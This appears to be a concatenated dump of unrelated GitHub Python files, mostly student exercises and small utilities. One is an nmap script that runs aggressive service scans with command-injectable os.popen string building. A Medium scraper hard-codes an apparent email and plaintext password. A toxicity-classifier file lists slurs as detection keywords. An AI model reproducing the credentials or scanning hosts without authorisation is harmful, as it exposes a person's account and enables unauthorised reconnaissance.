출력하라\nfirP=int(input(\"enter the number of slices of pizza at first:\"))\neatP=int(input(\"enter the number of slices of pizza you ate: \"))\nleftP=firP-eatP\nprint(\"⍙\\n\"*leftP)\n\n#07. 사용자로 부터 이름과 나이를 입력받아 다음과 같이 출략하시오: [이름] next birthday, you will be [나이]\na, b =input(\"enter your name and age(seperate to ,):\").split(\",\") #원하는 값을 \nnm=str(a)\nbt=int(b)+1\nprint(\"%s! next birthday, you will be %d-year-old\" %(nm, bt)) #같은 형식의 값을 출력하기위해서 다음과 같이 괄호로 묶는다\n\n#08. 계산서의 총 가격과 몇명이 같이 식사했는지 입력받는다. 총 가격을 인원수로 나누고 사람씩 얼마를 내야하는지 출력하라\ncost=[] #cost를 리스트로 지정 \na = input(\"how much is the each prices of menu(seperate\" \")\").split()\nb=int(a)\npeop= input(\"how many does the number of people ate with you? (include you) \")\n#for i in range(b):\n #al=sum\nprint(\"the number of guest: \" %peop)\nprint(\"\\nthe price to pay for food: \" %sum(b))\n\n#09. 사용자로부터 입력받은 시간이 각 단위별로 값이 얼마인지 환산하기\nnw=input(\" 원하는 값의 숫자를 입력하시오: \")\nti=int(nw)\nmn=ti*60\nsc=mn*60\nprint( \"%d는 %d분과%d분과 같은 시간입니다\" %(ti,mn,sc))\n\n#10 몸무게를 입력받아서 파운드로 출력\ngram=input(\"what much do you weigh?: \")\npound=int(gram)\npound=pound*2.204\nprint(\"%d pound\"%pound)\n\n#11 사용자로부터 100이 넘는 숫자와 10미만의 자연수를 입력받아 나눗셈의 몫을 사용자 친화적으로 표현하라\nbigN=input(\"enter the number over 100: \")\nsmallN=input(\"enter thr small number under 10: \")\nresult=bigN//smallN\nprint(\"%dis %dtimes as big as %d \"%(bigN,result,smallN))","repo_name":"opuntia88/stud_code","sub_path":"py/book_py_01_test.py","file_name":"book_py_01_test.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"2155008775","text":"c = int(input()) # quilometros por litro\nd = int(input()) # distancia até o aeroporto\nl = int(input()) # número de litros de combustível no tanque\n\nquilometros = c*l # quantos quilômetros ele pode rodar\n\nif quilometros > d :\n print(0)\nelse:\n print(f\"{(d-quilometros)/c :.1f}\")","repo_name":"Master-Humberto/OBI","sub_path":"tanque.py","file_name":"tanque.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"20903278642","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom termcolor import colored\nimport os\n\n\ndef fun(dom,port):\n cmd = \"nmap -sC -sV -A -Pn -vv -p \" + str(port) + \" \" + str(dom)\n try:\n res = os.popen(cmd)\n output = res.read()\n print(output)\n f.write(output.__str__() + \"\\n\\n\")\n except Exception as e:\n print(e)\n f.write(str(e) + \"\\n\\n\")\n\n\n\n# MAIN FUNCTION\nif __name__ == '__main__':\n try:\n print(\"\\n DCE SERVICE CHECK USING NMAP\")\n path = input(\"\\nPlease provide the path to file: \")\n file = open(path.__str__().rstrip('\\n'), \"r\")\n print(\"\\n\")\n f = open( \"dce_test\" ,\"a+\")\n for target in file:\n url = target.__str__().rstrip('\\n').rstrip(' ')\n dom,port = url.split(\":\")\n print(colored(\"Scanning \" + str(dom) + \":\" + str(port) , \"blue\"))\n print()\n fun(dom,port)\n\n except KeyboardInterrupt:\n print(\"Canceling script...\")\n except Exception as e:\n print(e)\n","repo_name":"Mohit0/zero-scanner","sub_path":"additions/service_checker.py","file_name":"service_checker.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"44933769563","text":"import shutil\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog as fd\n\n\n\ndef profile_window(): #функция для личного профиля\n home = tk.Tk() # создание домашней страницы личного профиля\n home.title(\"Добро пожаловать!\")\n home.geometry(\"900x700\")\n home.resizable(width=FALSE, height=FALSE)\n home['bg'] = 'white'\n image = PhotoImage(\n file=r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/perepis.png\")\n user_avatar = Label(home, image=image) #место аватарки для пользователя\n user_avatar.place(x=20, y=20)\n button_input = Button(home, text='Выбрать фотку', bg='gold', font='Arial 9')#, command=lambda: #open_file())\n button_input.place(x=75, y=280)\n avatar_name = Label(home, text='Возраст', font='Arial 18', bg='gold', fg='black', padx=30)\n avatar_name.place(x=300, y=30)\n text_login = Label(home, text='Введенное имя', font='Arial 18', bg='gold', fg='black', padx=30)\n text_login.place(x=300, y=100)\n button_input1 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input1.place(x=300, y=200)\n button_input2 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input2.place(x=300, y=250)\n button_input2 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input2.place(x=300, y=300)\n button_input4 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input4.place(x=550, y=200)\n button_input4 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input4.place(x=550, y=250)\n button_input6 = Button(home, text='Выберите жанр книги!', bg='gold', font='Arial 13', height=1)\n button_input6.place(x=550, y=300)\n button_forgot = Button(home, text='Подобрать книги', bg='gold', font='Arial 18')\n button_forgot.place(x=420, y=350)\n # list_for_image = []#создание ссылки для фотографии\n\n # def open_file():\n # filetypes = ((\"Изображение\", \"*.png\"),)#задаем формат\n # my_file = fd.askopenfilename(title=\"Открыть файл\", filetypes=filetypes)#открываем файл для чтения\n # for m in my_file:#копируем выбранный файл\n # shutil.copyfile(my_file,\n # r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\")\n # break\n # image_path = r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\"\n # img = Image.open(image_path)\n # new_image = img.resize((250, 250))#задаем размеры\n # new_image.save(\n # r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\")\n # user_avatar.destroy()#удаляем прошлую фотку\n # imagea = PhotoImage(\n # file=r\"/home/arkadi/PycharmProjects/recomendation-book-system/resource/image/перепись.png\")\n # list_for_image.append(imagea)\n # avatara = Label(home, image=imagea)\n # avatara.place(x=20, y=20)\n\n home.mainloop()\n\nprofile_window()","repo_name":"VartanyanAdik/recomendation-book-system","sub_path":"stra.py","file_name":"stra.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71660611057","text":"from aocd import data, submit\r\nfrom itertools import product\r\nimport numpy as np\r\n\r\n\r\nlights = np.zeros((1000, 1000), dtype=np.int32)\r\nfor row in data.split(\"\\n\"):\r\n row = row[6:]\r\n if row[0] == \"f\": val = -1\r\n elif row[0] == \"n\": val = 1\r\n else: val = 2\r\n\r\n row = row.split(\" \")\r\n x0, y0 = map(int, row[1].split(\",\"))\r\n x1, y1 = map(int, row[3].split(\",\"))\r\n\r\n for x, y in product(range(x0, x1+1), range(y0, y1+1)):\r\n lights[y][x] += val\r\n if lights[y][x] == -1: lights[y][x] = 0\r\n\r\nresult = np.sum(lights)\r\nprint(\"result\", result)\r\nsubmit(result)\r\n\r\n","repo_name":"Luke-1335/aocd","sub_path":"2015/2015-06-b.py","file_name":"2015-06-b.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24529487414","text":"import os\nimport sys\nfrom lxml import html\n\ndef get_names_from_readme(readme_path):\n with open(readme_path, \"r\") as file:\n readme_content = file.read()\n\n tree = html.fromstring(readme_content)\n table = tree.xpath('//table')[0]\n rows = table.xpath('.//tr')\n names = []\n\n for row_index, row in enumerate(rows):\n cols = row.xpath('.//td')\n if len(cols) == 7: # Only process rows with exactly 7 columns\n for col_index, col in enumerate(cols):\n name_element = col.xpath('.//b')\n if name_element:\n name = name_element[0].text.strip()\n line_num = name_element[0].sourceline\n names.append((name, line_num))\n else:\n print(f\"Debug: Found {len(cols)} columns in row {row_index + 1}. Skipping row.\")\n\n return names\n\ndef main():\n base_names = get_names_from_readme(\"README.md\")\n head_names = get_names_from_readme(\"head/README.md\")\n\n print(f\"Debug: Base names: {base_names}\")\n print(f\"Debug: Head names: {head_names}\")\n\n # Check for duplicates\n head_name_dict = {name: line_num for name, line_num in head_names}\n if len(head_name_dict) != len(head_names):\n duplicates = [line_num for name, line_num in head_names if head_names.count(name) > 1]\n print(f\"Error: Duplicate names found on lines: {', '.join(map(str, duplicates))}\")\n sys.exit(1)\n\n # Check if name is added at the end of the table\n added_names = list(set(head_name_dict.keys()) - set(name for name, _ in base_names))\n if len(added_names) != 1:\n print(\"Error: Only one name should be added.\")\n sys.exit(1)\n\n added_name = added_names[0]\n if added_name != head_names[-1][0]:\n print(f\"Error: Names should be added at the end of the table. Line: {head_names[-1][1]}\")\n sys.exit(1)\n\n # Check if the table structure is maintained\n tree = html.fromstring(open(\"head/README.md\", \"r\").read())\n table = tree.xpath('//table')[0]\n rows = table.xpath('.//tr')\n\n for row in rows:\n cols = row.xpath('.//td')\n if len(cols) > 7:\n print(f\"Error: There should be no more than 7 columns in each row. Line: {cols[7].sourceline}\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alisolanki/Welcome-to-Open-Source","sub_path":".github/workflows/validate_pr.py","file_name":"validate_pr.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":1409,"dataset":"github-code","pt":"57"} +{"seq_id":"4963914849","text":"# Multidimensional Bernoulli distribution functions\n#\n# m.mieskolainen@imperial.ac.uk, 2020\n\nimport numpy as np\nimport numba\n\n\n@numba.njit\ndef bernoulli3_combinations(nT,nI,nF):\n \"\"\" Count 3-Bernoulli combinations.\n \n Args:\n nT,nI,nF: three arrays with {0,1} (Bernoulli) values\n \n Returns:\n Numpy array with 8 elements\n \"\"\"\n\n # Right endian binary expansion\n bstr = nT*4 + nI*2 + nF\n\n # Accumulate\n B = np.zeros(2**3, dtype=np.double)\n for i in range(len(nT)):\n B[bstr[i]] += 1\n\n return B\n\n\n@numba.njit\ndef bernoulli3_parameters(nT,nI,nF, EPS = 1E-15):\n \"\"\" Compute 3-point (multivariate) Bernoulli parameters: 2**3-1 = 7.\n \n Args:\n nT,nI,nF: are arrays containing Bernoulli random numbers\n\n Returns:\n Numpy array containing 7 parameters\n \"\"\"\n # Expectation values\n P_T = np.mean(nT)\n P_I = np.mean(nI)\n P_F = np.mean(nF)\n\n # Standard deviations\n std_T = np.std(nT)\n std_I = np.std(nI)\n std_F = np.std(nF)\n\n std_T = EPS if std_T < EPS else std_T\n std_I = EPS if std_I < EPS else std_I\n std_F = EPS if std_F < EPS else std_F \n \n # Correlation coefficients (2-point and 3-point)\n C_TI = np.mean((nT - P_T) * (nI - P_I)) / (std_T * std_I)\n C_TF = np.mean((nT - P_T) * (nF - P_F)) / (std_T * std_F)\n C_IF = np.mean((nI - P_I) * (nF - P_F)) / (std_I * std_F)\n C_TIF = np.mean((nT - P_T) * (nI - P_I) * (nF - P_F)) / (std_T * std_I * std_F)\n\n return np.array([P_T, P_I, P_F, C_TI, C_TF, C_IF, C_TIF])\n\n\ndef bernoulli2_is_valid(EX, EY, rho):\n \"\"\" Calculate phase-space admissibility of the 2D-Bernoulli distribution parameters.\n\n Args:\n EX: expectation value of X\n EY: expectation value of Y\n rho: correlation coefficient [-1,1] between (X,Y)\n \n Returns:\n True or False\n \"\"\"\n\n # First get the representation\n P = bernoulli2_rep(EX,EY,rho)\n\n # Then see, if it is within the probability phase-space\n if (np.all(P >= 0)) & (np.all(P <= 1)) & (np.sum(P) <= 1):\n return True\n else:\n return False\n\n\ndef bernoulli2_rhorange(EX, EY, n=10000):\n \"\"\" Get valid rho-parameter range given EX and EY.\n\n Args:\n EX: the expectation value of X\n EY: the expectation value of Y\n\n Returns:\n minv : minimum value\n maxv : maximum value\n \"\"\"\n # Find valid range\n rhoval = np.linspace(-1, 1, n)\n valid = np.zeros(len(rhoval))\n for i in range(len(rhoval)):\n valid[i] = bernoulli2_is_valid(EX=EX, EY=EY, rho=rhoval[i])\n\n # Find minimum\n minv = 0\n for i in range(len(valid)):\n if valid[i]:\n minv = rhoval[i]\n break\n\n # Find maximum\n maxv = 0\n for i in range(len(valid)):\n if valid[i]:\n maxv = rhoval[i]\n\n return minv, maxv\n\n@numba.njit\ndef bernoulli2_rep(EX, EY, rho):\n \"\"\" Change the representation of 2-point Bernoulli basis to the 2-hypercube basis.\n\n Args:\n EX: the expectation value of X\n EY: the expectation value of Y\n rho: the correlation coefficient\n\n Returns:\n P: numpy array with 4 probability elements\n \"\"\"\n\n # Change the representation to a multinomial (hypercube) basis\n p3 = rho*np.sqrt(EX*EY*(EX - 1)*(EY - 1)) + EX*EY\n p2 = EX - p3\n p1 = EY - p3\n p0 = 1 - (p1 + p2 + p3)\n\n P = np.array([p0, p1, p2, p3])\n\n # For speed, we do not test here if we are inside physically\n # possible phase-space [that check is done outside this function]\n\n return P\n\n@numba.njit\ndef bernoulli2_rand(n, EX, EY, rho=0):\n \"\"\" Generate 2-dimensional Bernoulli random numbers Z = (X,Y).\n with a non-zero correlation coefficient rho(X,Y) in [-1,1]\n\n Note! Test the input parameters first with bernoulli2_is_valid() function.\n \n Args:\n n : Number of experiments\n EX : Mean in [0, 1]\n EY : Mean in [0, 1]\n rho : Corr[X,Y] in [-1,1]\n\n Returns:\n v : Bernoulli random 2-vectors\n\n Examples:\n $ v = bernoulli2_rand(n=1000000, EX=0.2, EY=0.4, rho=0.2)\n $ print(f' = {np.mean(v[:,0])}, = {np.mean(v[:,1])}')\n $ print(f'COR = {np.corrcoef(v[:,0], v[:,1])}')\n \"\"\"\n\n # Change the representation\n P = bernoulli2_rep(EX, EY, rho)\n\n # Cast numbers via the multinomial distribution\n m = np.random.multinomial(n, P)\n\n # Generate Bernoulli 2-vectors\n B = np.array([[0,0], [0,1], [1,0], [1,1]])\n\n # Random order\n order = np.arange(n)\n np.random.shuffle(order) # in-place\n k = 0\n \n # Generate vectors in random order\n v = np.zeros((n,2))\n for c in range(4):\n for i in range(m[c]):\n v[order[k],:] = B[c,:]\n k += 1\n \n return v\n","repo_name":"mieskolainen/covidgen","sub_path":"covidgen/bernoulli.py","file_name":"bernoulli.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"30510713040","text":"# The average strike force of Frog A was 0.71 Newtons (N), and that of Frog B was 0.42 N for a difference of 0.29 N. It is possible the frogs strike with the same force and this observed difference was by chance. You will compute the probability of getting at least a 0.29 N difference in mean strike force under the hypothesis that the distributions of strike forces for the two frogs are identical. We use a permutation test with a test statistic of the difference of means to test this hypothesis.\n\n# For your convenience, the data has been stored in the arrays force_a and force_b.\n\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n\ndef permutation_sample(data1, data2):\n \"\"\"Generate a permutation sample from two data sets.\"\"\"\n\n # Concatenate the data sets: data\n data = np.concatenate((data1,data2))\n\n # Permute the concatenated array: permuted_data\n permuted_data = np.random.permutation(data)\n\n # Split the permuted array into two: perm_sample_1, perm_sample_2\n perm_sample_1 = permuted_data[:len(data1)]\n perm_sample_2 = permuted_data[len(data1):]\n\n return perm_sample_1, perm_sample_2\n\n\t\ndef draw_perm_reps(data_1, data_2, func, size=1):\n \"\"\"Generate multiple permutation replicates.\"\"\"\n\n # Initialize array of replicates: perm_replicates\n perm_replicates = np.empty(size)\n\n for i in range(size):\n # Generate permutation sample\n perm_sample_1, perm_sample_2 = permutation_sample(data_1, data_2)\n\n # Compute the test statistic\n perm_replicates[i] = func(perm_sample_1, perm_sample_2)\n\n return perm_replicates\n\t\ndf = pd.read_csv('data.csv', sep='\\t', header=0)\n\nsns.set()\n#print(df)\t\n\t\n# Make bee swarm plot\n_ = sns.swarmplot(x='ID', y='impact_force', data=df)\n\n# Label axes\n_ = plt.xlabel('frog')\n_ = plt.ylabel('impact force (N)')\n\n# Show the plot\nplt.show()\n\n\ndef diff_of_means(data_1, data_2):\n \"\"\"Difference in means of two arrays.\"\"\"\n\n # The difference of means of data_1, data_2: diff\n diff = np.mean(data_1) - np.mean(data_2)\n\n return diff\n\t\nforce_a= df['impact_force'][(df['ID']=='A')].tolist()\nforce_b= df['impact_force'][(df['ID']=='B')].tolist()\n\nprint(force_a)\nprint(force_b)\n\n# Compute difference of mean impact force from experiment: empirical_diff_means\nempirical_diff_means = diff_of_means(force_a, force_b)\n\n# Draw 10,000 permutation replicates: perm_replicates\nperm_replicates = draw_perm_reps(force_a, force_b,\n diff_of_means, size=10000)\n\n# Compute p-value: p\np = np.sum(perm_replicates >= empirical_diff_means) / len(perm_replicates)\n\n# Print the result\nprint('p-value =', p)\n\n\n# The p-value tells you that there is about a 0.6% chance that you would get the difference of means observed in the experiment if frogs were exactly the same. A p-value below 0.01 is typically said to be \"statistically significant,\", but: warning! warning! warning! You have computed a p-value; it is a number. I encourage you not to distill it to a yes-or-no phrase. p = 0.006 and p = 0.000000006 are both said to be \"statistically significant,\" but they are definitely not the same!\n\n# When you perform a hypothesis test in statistics, a p-value helps you determine the significance of your results. ... The p-value is a number between 0 and 1 and interpreted in the following way: A small p-value (typically ≤ 0.05) indicates strong evidence against the null hypothesis, so you reject the null hypothesis.\n","repo_name":"dmonisankar/pythonworks","sub_path":"DataScienceWithPython/sample_python_code/statistic/part2/sp014.py","file_name":"sp014.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"19555098992","text":"\nimport sys, os, time, json, requests, re, argparse\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.chrome.options import Options\n\n\nos.chdir(r'C:\\Users\\takis\\Google Drive\\_projects_\\medium-to-notion')\nsaved_links_df = pd.read_pickle(\"data/title_link.pkl\")\n\nCHROME_DRIVER = r'C:\\Users\\takis\\Google Drive\\chromedriver.exe'\nPAGE = \"https://medium.com\"\nMEDIUM_BOOKMARKS_PAGE = \"https://medium.com/me/list/queue\"\nEMAIL = 'pan.fessas@gmail.com'\nPASSWORD = 'T28!1990akis'\n\n\ndef parse_user_arg():\n parser = argparse.ArgumentParser(description=\"Parse links given a CSV file\")\n parser.add_argument(\"-f\",\"--file\", help=\"filepath for csv that contains the links to parse\")\n args = parser.parse_args()\n return args.file\n\n\ndef browse_medium_bookmarks():\n\n global driver\n driver = webdriver.Chrome(CHROME_DRIVER)\n driver.get(PAGE)\n\n def navigate_to_xpath(xpath,keys=None):\n element = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, xpath))\n )\n temp_field = driver.find_element_by_xpath(xpath)\n if keys:\n temp_field.send_keys(keys)\n else :\n temp_field.click()\n\n # get started button\n navigate_to_xpath('//*[@id=\"top-nav-get-started-cta\"]/div/span/a/button')\n # sign in button\n navigate_to_xpath('//*[@id=\"susi-modal-sign-up-link\"]/div/h4/button/b')\n # google sign in button\n navigate_to_xpath('//*[@id=\"susi-modal-google-button\"]/a/div')\n # type in email\n navigate_to_xpath('//*[@id=\"identifierId\"]',EMAIL)\n # proceed\n navigate_to_xpath('//*[@id=\"identifierNext\"]/div/button/div[2]')\n # type in password\n navigate_to_xpath('//*[@id=\"password\"]/div[1]/div/div[1]/input', PASSWORD)\n # proceed\n navigate_to_xpath('//*[@id=\"passwordNext\"]/div/button/div[2]')\n time.sleep(3)\n # go to bookmarks page\n driver.get(MEDIUM_BOOKMARKS_PAGE)\n # close pop up window\n navigate_to_xpath('/html/body/div[2]/div/div/div/div[1]/div/button')\n\n\ndef scroll_down():\n\n lenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\n match = False\n while (match == False):\n lastCount = lenOfPage\n time.sleep(3)\n lenOfPage = driver.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\"\n )\n if lastCount == lenOfPage:\n match = True\n\n\ndef scroll_down_to_existing():\n\n lenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\n match = False\n counter = 1\n\n while (match == False):\n\n print(f'Iteration {counter}')\n if counter % 5 == 0 :\n print(f'Cross Check with existing links {counter}')\n gather_links()\n diff_checker(saved_links_df, temp_df)\n if intersection :\n break\n\n lastCount = lenOfPage\n time.sleep(3)\n lenOfPage = driver.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\"\n )\n if lastCount == lenOfPage:\n match = True\n counter += 1\n\n\ndef gather_links():\n global temp_df\n # EXTRACT PAGE SOURCE AFTER SCROLLING\n page_source = driver.page_source\n soup = BeautifulSoup(page_source, 'lxml')\n\n # BS4 to parse links so far\n # refresh the 'class_' component below\n divsoup = soup.find_all('div', class_ =\"fk el fl fm\")\n print(f'>> Count of items prior parsing {len(divsoup)}')\n\n titles, links = [], []\n for ds in divsoup:\n\n # scrape links\n link = (ds.find('a', href=True)['href'])\n link = link.replace('source=bookmarks', 'rr')\n if not link.startswith('https'):\n link = 'https://medium.com' + link\n links.append(link)\n\n # scrape title articles\n # refresh the 'class_' component below\n title = ds.find('h2', class_='ax gd cg az ge cj').text\n titles.append(title)\n\n print(f'>> Running Count of {len(titles)} titles with {len(links)} links')\n assert len(titles) == len(links)\n temp_df = pd.DataFrame({'title' : titles, 'link' : links})\n\n\ndef diff_checker(saved_links_df,temp_df):\n global intersection\n global updated_title_link_df\n intersection = list(set(temp_df.title.tolist()).intersection(set(saved_links_df.title.tolist())))\n new_titles = list(set(temp_df.title.tolist()).difference(set(saved_links_df.title.tolist())))\n new_titles_df = temp_df.query(\" title in @new_titles \")\n updated_title_link_df = pd.concat([new_titles_df, saved_links_df])\n\n\nif __name__ == \"__main__\":\n\n start = time.time()\n browse_medium_bookmarks()\n scroll_down_to_existing()\n driver.close()\n print(f'Saving new file with {updated_title_link_df.shape[0]} rows')\n updated_title_link_df.to_pickle('data/title_link.pkl')\n end = time.time()\n print(f'Process took {end-start}')\n","repo_name":"Takfes/python-nlp-medium","sub_path":"code/scrape_medium_v1.py","file_name":"scrape_medium_v1.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"39834199303","text":"from transformers import RobertaForSequenceClassification\nfrom transformers import RobertaTokenizer\nfrom torch.utils.data import DataLoader, TensorDataset\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import tensor\nimport json\nimport numpy as np\n\n# EPOCH = 10\n# train_path = 'train.json'\n# test_path = 'test.json'\n# valid_path = \"valid.json\"\n# LR = 0.001\n# use_focal_loss=1\n# DEVICE = torch.device(\"cuda:4\")\n# BATCH_SIZE = 32\n\n# model = RobertaForSequenceClassification.from_pretrained('roberta-base')\n# tokenizer = RobertaTokenizer.from_pretrained('roberta-base')\n# optimizer = torch.optim.AdamW(model.parameters(), lr=LR)\n# model = model.to(DEVICE)\n\ndef sigmoid_focal_loss(\n inputs: torch.Tensor,\n targets: torch.Tensor,\n alpha: float = 0.25,\n gamma: float = 2,\n reduction: str = \"none\",\n):\n \"\"\"\n Original implementation from https://github.com/facebookresearch/fvcore/blob/master/fvcore/nn/focal_loss.py .\n Loss used in RetinaNet for dense detection: https://arxiv.org/abs/1708.02002.\n\n Args:\n inputs: A float tensor of arbitrary shape.\n The predictions for each example.\n targets: A float tensor with the same shape as inputs. Stores the binary\n classification label for each element in inputs\n (0 for the negative class and 1 for the positive class).\n alpha: (optional) Weighting factor in range (0,1) to balance\n positive vs negative examples or -1 for ignore. Default = 0.25\n gamma: Exponent of the modulating factor (1 - p_t) to\n balance easy vs hard examples.\n reduction: 'none' | 'mean' | 'sum'\n 'none': No reduction will be applied to the output.\n 'mean': The output will be averaged.\n 'sum': The output will be summed.\n Returns:\n Loss tensor with the reduction option applied.\n \"\"\"\n p = torch.sigmoid(inputs)\n ce_loss = F.binary_cross_entropy_with_logits(\n inputs, targets, reduction=\"none\"\n )\n p_t = p * targets + (1 - p) * (1 - targets)\n loss = ce_loss * ((1 - p_t) ** gamma)\n\n if alpha >= 0:\n alpha_t = alpha * targets + (1 - alpha) * (1 - targets)\n loss = alpha_t * loss\n\n if reduction == \"mean\":\n loss = loss.mean()\n elif reduction == \"sum\":\n loss = loss.sum()\n\n return loss\n\n# class FocalLoss(nn.Module):\n# def __init__(self, alpha=0.999, gamma=2):\n# super(FocalLoss, self).__init__()\n# self.alpha = alpha\n# self.gamma = gamma\n\n# def forward(self, inputs, targets):\n# bce_loss = F.binary_cross_entropy(inputs.squeeze(), targets)\n# loss = self.alpha * (1 - torch.exp(-bce_loss)) ** self.gamma * bce_loss\n# return loss\n\n\ndef isPolluted(sentence):\n is_fuck=0\n if \"fuck\" in sentence or \"Fuck\" in sentence or \"fucking\" in sentence:\n is_fuck=1\n return 1\n\n is_offensive_prefix=0\n offensive_list=[\" BS\",\" crap\",\"that mouth\",\"dare\",\"hell\",\"devil\",\"bitch\",\n \"son of\",\"Son of\",\"Damn\",\"big mouth\",\" beast\",\" sick\",\"hate\",\n \"bother\"]\n for word in offensive_list:\n if word in sentence:\n is_offensive_prefix=1\n return 1\n\n is_offensive_role=0\n dirty_role_ls=[\"nigger\",\"negro\",\"chink\",\" spic\",\" honky\",\" kraut\",\" kike\",\n \"bitch\",\" cunt\",\"faggot\",\"dyke\"]\n for dr in dirty_role_ls:\n if dr in sentence:\n is_offensive_role=1\n return 1\n\n return 0.0\n\n\n\ndef preprocess(tokenizer,device,batch_size=32):\n root_dir=\"/home/liangzi/datasets/soloist/pollution0.1-multiwoz-2.1/\"\n train_dataset = make_dataset(mode=\"train\",\n tokenizer=tokenizer,\n device=device,\n root_dir=root_dir)\n test_dataset = make_dataset(mode=\"test\",\n tokenizer=tokenizer,\n device=device,\n root_dir=root_dir)\n val_dataset = make_dataset(mode=\"val\",\n tokenizer=tokenizer,\n device=device,\n root_dir=root_dir) \n\n\n train_loader = DataLoader(train_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n val_loader = DataLoader(val_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n test_loader = DataLoader(test_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n\n # test_loader = DataLoader(test_dataset,\n # batch_size=batch_size,\n # drop_last=True)\n \n # valid_loader = DataLoader(valid_dataset,\n # batch_size=batch_size,\n # drop_last=True)\n\n return train_loader,test_loader,val_loader\n\ndef make_dataset(mode, tokenizer, device,root_dir=\"/home/liangzi/datasets/soloist/Hpollution0.1-multiwoz-2.1/\"):\n path_name = \"train\" + '.json'\n path_name=root_dir+path_name\n with open(path_name, 'r') as f:\n text = json.load(f)\n features = []\n labels = []\n text = text['dialogues']\n\n num_samples=len(text)\n train_num=int(0.7*num_samples)\n val_num=int(0.1*num_samples)\n test_num=num_samples-train_num-val_num\n if mode==\"train\":\n text=text[:train_num]\n elif mode ==\"test\":\n text=text[train_num:(train_num+test_num)]\n else:\n text=text[(train_num+test_num):]\n \n \n for i,dialogues in enumerate(text):\n items = dialogues['items']\n for ii in range(len(items)):\n if ii % 2 == 0:\n continue\n new_text = items[ii]['delexicalised_text']\n\n if isPolluted(new_text):\n labels.append([1])\n else:\n labels.append([0])\n\n index_tokens, segment_id, input_mask = convert_text_to_ids_segment(new_text,max_sentence_length=15, tokenizer=tokenizer)\n\n features.append(index_tokens)\n\n \n feature = tensor(features, dtype=torch.long).to(device, dtype=torch.long)\n label = tensor(labels, dtype=torch.long).to(device, dtype=torch.long)\n # print(all_feature.shape, all_label.shape)\n \n dataset = TensorDataset(feature, label)\n\n return dataset\n\n\ndef convert_text_to_ids_segment(text, max_sentence_length,tokenizer):\n tokenize_text = tokenizer.tokenize(text)\n index_tokens = tokenizer.convert_tokens_to_ids(tokenize_text)\n input_mask = [1] * len(index_tokens)\n if max_sentence_length < len(index_tokens):\n index_tokens = index_tokens[:max_sentence_length]\n segment_id = [0] * max_sentence_length\n input_mask = input_mask[:max_sentence_length]\n else:\n pad_index_tokens = [0] * (max_sentence_length - len(index_tokens))\n index_tokens.extend(pad_index_tokens)\n input_mask_pad = [0] * (max_sentence_length - len(input_mask))\n input_mask.extend(input_mask_pad)\n segment_id = [] * max_sentence_length\n\n # index_tokens = torch.tensor(index_tokens, dtype=torch.long)\n # segment_id = torch.tensor(segment_id, dtype=torch.long)\n # input_mask = torch.tensor(input_mask, dtype=torch.long)\n return index_tokens, segment_id, input_mask\n\n\ndef train(model, optimizer, train_loader,EPOCH,LR,DEVICE, batch_size=32, use_focal_loss=1):\n for epoch in range(EPOCH):\n correct = 0\n undetected = 0\n detected = 0\n # nums=len(train_loader)\n print(f\"-------EPOCH {epoch}-------------\")\n for i,(inputs, labels) in enumerate(train_loader):\n # print(inputs.shape)\n outputs = model(inputs,labels=labels)\n prediction = torch.nn.functional.softmax(outputs.logits,dim=1)\n if use_focal_loss==0:\n loss = outputs.loss\n else:\n # print(\"=============\")\n # print(labels.shape)\n # print(labels)\n 